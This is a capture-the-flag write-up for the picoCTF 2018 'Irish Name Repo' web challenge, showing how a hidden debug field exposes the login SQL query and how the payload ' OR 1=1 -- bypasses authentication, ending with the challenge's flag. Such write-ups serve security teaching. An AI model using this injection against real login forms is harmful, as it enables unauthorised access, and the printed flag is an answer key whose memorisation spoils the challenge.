Tags: sqli 

Rating:

The hint here seems to point at an
[SQL injection](https://www.owasp.org/index.php/SQL_Injection), but let's
browse around the app. We have access to three views :

1. The index, that has nothing interesting
2. A "support" page
3. An "admin login page"

The support page contains another clue pointing at an SQL injection :

> Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep
> getting something called a SQL Error

With that in mind, we can look at the login page. Inspecting the source, we see
there's a hidden `debug` field :

```html
<form action="login.php" method="POST">
<fieldset>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" class="form-control">
</div>
<div class="form-group">
<label for="password">Password:</label>
<div class="controls">
<input type="password" id="password" name="password" class="form-control">
</div>
</div>
<input type="hidden" name="debug" value="0">

<div class="form-actions">
<input type="submit" value="Login" class="btn btn-primary">
</div>
</fieldset>
</form>
```

To confirm that, I sent a request with a random username and no password (Note:
I used Burp suite's proxy and repeater to manipulate the requests). With
`debug=0`, we get :

```html
<h1>Login failed.</h1>
```

and with `debug=1` :

```html

username: iodbh
password:
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
<h1>Login failed.</h1>
```

Great, no we know how to construct the SQL query.We can to return all rows
with a username or `' OR 1=1 --` and an empty password, which will end up
constructing the following request :

```sql
SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''
```

Since anything after `--` is ignored, the effective query is :

```sql
SELECT * FROM users WHERE name='' OR 1=1
```

If we try this payload, we get the flag in the response :
`picoCTF{con4n_r3411y_1snt_1r1sh_9cbc118f}`

Original writeup (http://blog.iodbh.net/picoctf2018-web-irish-name-repo.html).